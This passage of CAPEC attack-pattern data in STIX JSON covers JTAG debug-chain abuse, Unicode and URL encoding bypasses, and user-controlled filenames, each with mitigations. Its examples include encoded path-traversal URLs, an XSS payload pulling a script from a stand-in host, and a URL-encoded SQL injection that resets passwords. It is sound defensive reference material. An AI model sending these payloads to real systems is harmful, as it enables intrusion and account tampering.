This happens when authorization is not checked on a per function basis and is assumed for a chain or group of debug functionality.\n ", + "external_references": [ + { + "external_id": "CAPEC-702", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/702.html" + }, + { + "external_id": "CWE-1296", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1296.html" + }, + { + "description": "Hewlett-Packard Journal, Overview of the Test Access Port, 1994--12", + "external_id": "REF-748", + "source_name": "reference_from_CAPEC", + "url": "https://www.hpl.hp.com/hpjournal/94dec/dec94a7a.pdf" + }, + { + "description": "Finding Faults with the Test Access Port (TAP), 2017--06---12", + "external_id": "REF-749", + "source_name": "reference_from_CAPEC", + "url": "https://flynn.com/2017/06/12/finding-faults-with-the-test-access-port-tap/" + }, + { + "description": "Technical Guide to JTAG", + "external_id": "REF-750", + "source_name": "reference_from_CAPEC", + "url": "https://www.xjtag.com/about-jtag/jtag-a-technical-overview/" + } + ], + "id": "attack-pattern--39c07233-f090-4a18-8e62-ef31faf1632f", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Exploiting Incorrect Chaining or Granularity of Hardware Debug Components", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A System-on-Chip (SoC) might give regular users access to the SoC-level TAP, but does not want to give access to all of the internal TAPs (e.g., Core). 
If any of the internal TAPs were incorrectly chained to the SoC-level TAP, this would grant regular users access to the internal TAPs and allow them to execute commands there.\n ", + "\n Suppose there is a hierarchy of TAPs (TAP_A is connected to TAP_B and TAP_C, then TAP_B is connected to TAP_D and TAP_E, then TAP_C is connected to TAP_F and TAP_G, etc.). Architecture mandates that the user have one set of credentials for just accessing TAP_A, another set of credentials for accessing TAP_B and TAP_C, etc. However, if, during implementation, the designer mistakenly implements a daisy-chained TAP where all the TAPs are connected in a single TAP chain without the hierarchical structure, the correct granularity of debug components is not implemented, and the attacker can gain unauthorized access.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find and scan debug interface: The adversary must first find and scan a debug interface to determine what they are authorized to use and what devices are chained to that interface.

  2. Techniques
    Use a JTAGulator on a JTAG interface to determine the correct pin configuration, baud rate, and number of devices in the chain

Experiment

  1. Connect to debug interface: The adversary next connects a device to the JTAG interface using the properties found in the explore phase so that they can send commands. The adversary sends some test commands to make sure the connection is working.

  2. Techniques
    Connect a device such as a BusPirate or UM232H to the JTAG interface and connect using pin layout found from the JTAGulator

Exploit

  1. Move along debug chain: Once the adversary has connected to the main TAP, or JTAG interface, they will move along the TAP chain to see what debug interfaces might be available on that chain.

  2. Techniques
    Run a command such as “scan_chain” to see what TAPs are available in the chain.
", + "x_capec_extended_description": "\n Chip designers often include design elements in a chip for debugging and troubleshooting such as:\n \n Various Test Access Ports (TAPs) which allow boundary scan commands to be executed.\n Scan cells that allow the chip to be used as a \"stimulus and response\" mechanism for scanning the internal components of a chip.\n Custom methods to observe the internal components of their chips by placing various tracing hubs within their chip and creating hierarchical or interconnected structures among those hubs.\n \n Because devices commonly have multiple chips and debug components, designers will connect debug components and expose them through a single external interface, which is referred to as “chaining”. Logic errors during design or synthesis could misconfigure the chaining of the debug components, which could allow unintended access. TAPs are also commonly referred to as JTAG interfaces.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Hardware device has an exposed debug interface" + ], + "x_capec_resources_required": [ + "A device to scan a TAP or JTAG interface, such as a JTAGulator", + "A device to communicate on a TAP or JTAG interface, such as a BusPirate" + ], + "x_capec_skills_required": { + "Medium": "Ability to operate devices to scan and connect to an exposed debug interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Ensure that debug components are properly chained, and their granularity is maintained at different authorization levels", + "id": "course-of-action--17433e7e-fe6b-4e63-98b3-d9236f49e962", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-702-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3151d214-5a9a-4841-a00e-2ece44eb4f6c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--17433e7e-fe6b-4e63-98b3-d9236f49e962", + "target_ref": "attack-pattern--39c07233-f090-4a18-8e62-ef31faf1632f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform Post-silicon validation tests at various authorization levels to ensure that debug components are only accessible to authorized users", + "id": "course-of-action--d0fd8185-9442-4860-bd79-71c0084cedc7", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-702-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--243e1c46-2598-4972-a1a7-e1fb53ec2ffe", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0fd8185-9442-4860-bd79-71c0084cedc7", + "target_ref": "attack-pattern--39c07233-f090-4a18-8e62-ef31faf1632f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the 
classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.", + "external_references": [ + { + "external_id": "CAPEC-71", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/71.html" + }, + { + "external_id": "CWE-176", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/176.html" + }, + { + "external_id": "CWE-179", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html" + }, + { + "external_id": "CWE-180", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-183", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-692", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/692.html" + }, + { + "description": "Unicode Encoding", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Unicode_Encoding" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Unicode Encoding to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A very common technique for a Unicode attack involves traversing directories looking for interesting files. An example of this idea applied to the Web is\n http://target.server/some_directory/../../../winnt\n In this case, the attacker is attempting to traverse to a directory that is not supposed to be part of standard Web services. The trick is fairly obvious, so many Web servers and scripts prevent it. However, using alternate encoding tricks, an attacker may be able to get around badly implemented request filters.\n In October 2000, an adversary publicly revealed that Microsoft's IIS server suffered from a variation of this problem. In the case of IIS, all the attacker had to do was provide alternate encodings for the dots and/or slashes found in a classic attack. The Unicode translations are\n . 
yields C0 AE/ yields C0 AF\\ yields C1 9C\n Using this conversion, the previously displayed URL can be encoded as\n http://target.server/some_directory/%C0AE/%C0AE/%C0AE%C0AE/%C0AE%C0AE/winntSee also: CVE-2000-0884" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for user-controllable inputs: Using a browser or an automated tool, an attacker follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe entry points to locate vulnerabilities: The attacker uses the entry points gathered in the \"Explore\" phase as a target list and injects various Unicode encoded payloads to determine if an entry point actually represents a vulnerability with insufficient validation logic and to characterize the extent to which the vulnerability can be exploited.

  2. Techniques
    Try to use Unicode encoding of content in Scripts in order to bypass validation routines.
    Try to use Unicode encoding of content in HTML in order to bypass validation routines.
    Try to use Unicode encoding of content in CSS in order to bypass validation routines.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Filtering is performed on data that has not be properly canonicalized." + ], + "x_capec_skills_required": { + "Medium": "An attacker needs to understand Unicode encodings and have an idea (or be able to find out) what system components may not be Unicode aware." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the system is Unicode aware and can properly process Unicode data. Do not make an assumption that data will be in ASCII.", + "id": "course-of-action--9a5363ad-5ca7-45b1-a710-9ee89914b20d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-71-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7431af74-11f2-4cf7-aa2d-aa0b07ff9256", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9a5363ad-5ca7-45b1-a710-9ee89914b20d", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that filtering or input validation is applied to canonical data.", + "id": "course-of-action--3b44d922-39ec-42cc-ae93-00b251aa514e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-71-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": 
"course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--caeb99db-8036-444d-a785-c9ac795a3cf9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3b44d922-39ec-42cc-ae93-00b251aa514e", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--25524460-3133-4541-a10d-84d3fd8a1db3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--523a56cb-eaa5-451a-8ba9-f85b37fad844", + "target_ref": "attack-pattern--663a1a48-1d23-4dd5-869a-02d5a6b05770", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL. 
An adversary can take advantage of the multiple way of encoding an URL and abuse the interpretation of the URL.", + "external_references": [ + { + "external_id": "CAPEC-72", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/72.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. 
McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "modified": "2022-09-29T00:00:00.000Z", + "name": "URL Encoding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n URL Encodings in IceCast MP3 Server.\n The following type of encoded string has been known traverse directories against the IceCast MP3 server9:\n http://[targethost]:8000/somefile/%2E%2E/target.mp3\n or using\n 
\"/%25%25/\" instead of \"/../\".\n The control character \"..\" can be used by an adversary to escape the document root.See also: CVE-2001-0784", + "\n Cross-Site Scripting\n \n URL-Encoded attack:http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2fwww.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e\n \n HTML execution:\n [REF-495]\n ", + "\n SQL Injection\n \n Original database query in the example file - \"login.asp\":SQLQuery = \"SELECT preferences FROM logintable WHERE userid='\" & Request.QueryString(\"userid\") & \"' AND password='\" & Request.QueryString(\"password\") & \"';\"\n \n URL-encoded attack:http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd%3d%270wn3d%27%3b--%00\n \n Executed database query:SELECT preferences FROM logintable WHERE userid='bob'; update logintable set password='0wn3d';\n From \"URL encoded attacks\", by Gunter Ollmann - http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html\n ", + "\n Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An adversary could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey web application for URLs with parameters: Using a browser, an automated tool or by inspecting the application, an adversary records all URLs that contain parameters.

  2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.

Experiment

  1. Probe URLs to locate vulnerabilities: The adversary uses the URLs gathered in the \"Explore\" phase as a target list and tests parameters with different encodings of special characters to see how the web application will handle them.

  2. Techniques
    Use URL encodings of special characters such as semi-colons, backslashes, or question marks that might be filtered out normally.
    Combine the use of URL encodings with other encoding techniques such as the triple dot and escape slashes.

Exploit

  1. Inject special characters into URL parameters: Using the information gathered in the \"Experiment\" phase, the adversary injects special characters into the URL using URL encoding. This can lead to path traversal, cross-site scripting, SQL injection, etc.

", + "x_capec_extended_description": "\n A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE).\n For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An adversary will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL.\n It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc. The adversary could also subvert the meaning of the URL string request by encoding the data being sent to the server through a GET request. For instance an adversary may subvert the meaning of parameters used in a SQL request and sent through the URL string (See Example section).\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application should accepts and decodes URL input.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An adversary can try special characters in the URL and bypass the URL validation.", + "Medium": "The adversary may write a script to defeat the input filtering mechanism." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--000e54be-d542-4ff3-9e55-2b5ce4b1023d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f048925-3094-483c-abf2-c5efe689193a", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1e04db14-a140-40e0-aafe-1ec097c9a4d2", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1890182c-6989-4e34-bfb2-92b223bcae0c", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a27b504b-7f3c-47fb-ad70-9a9042fe74bd", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--24852297-758a-489f-b2c9-a27cbfbb938e", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fece2ddc-b7fd-4f9e-a015-51a13642ef80", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3833d761-4a54-4ed3-994b-c7c76c465ae0", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--506ec38c-6161-4411-b56b-cf20c5960c3c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--001320df-5e57-4ed3-bcf8-7e79dfe846aa", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding. 
(See related guideline section)", + "id": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-72-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2e586d60-d396-45aa-bfa2-afbd31a70dbb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--11783efd-94f2-4741-93c8-e33b1de782b8", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--32ed5b33-4ffc-4a9a-b6bf-f389799a677b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--95ef6587-c787-4051-b664-b5e8ca753c20", + "target_ref": "attack-pattern--d859e461-7ca6-46a6-842e-3f1750bc8415", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. 
In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.", + "external_references": [ + { + "external_id": "CAPEC-73", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-184", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-348", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/348.html" + }, + { + "external_id": "CWE-116", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html" + }, + { + "external_id": "CWE-350", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/350.html" + }, + { + "external_id": "CWE-86", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/86.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "description": "G. Hoglund, G. 
McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "modified": "2017-05-01T00:00:00.000Z", + "name": "User-Controlled Filename", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Alter Execution Logic" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Phishing attacks rely on a user clicking on links on that are supplied to them by attackers masquerading as a trusted resource such as a bank or online auction site. The end user's email client hosts the supplied resource name in this case via email. The resource name, however may either 1) direct the client browser to a malicious site to steal credentials and/or 2) execute code on the client machine to probe the victim's host system and network environment." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The victim must trust the name and locale of user controlled filenames." 
+ ], + "x_capec_skills_required": { + "High": "Exploiting a client side vulnerability to inject malicious scripts into the browser's executable process.", + "Low": "To achieve a redirection and use of less trusted source, an attacker can simply edit data that the host uses to build the filename", + "Medium": "Deploying a malicious \"look-a-like\" site (such as a site masquerading as a bank or online auction site) that the user enters their authentication data into." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5a1e9288-e1cd-4661-bafa-f7a7f61e4a8c", + "modified": "2017-05-01T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--094a4c09-e49c-422b-b8ec-b51c19dba18c", + "target_ref": "attack-pattern--f156c3d0-eeb3-4e12-b075-8995c009de55", + "type": "relationship", + 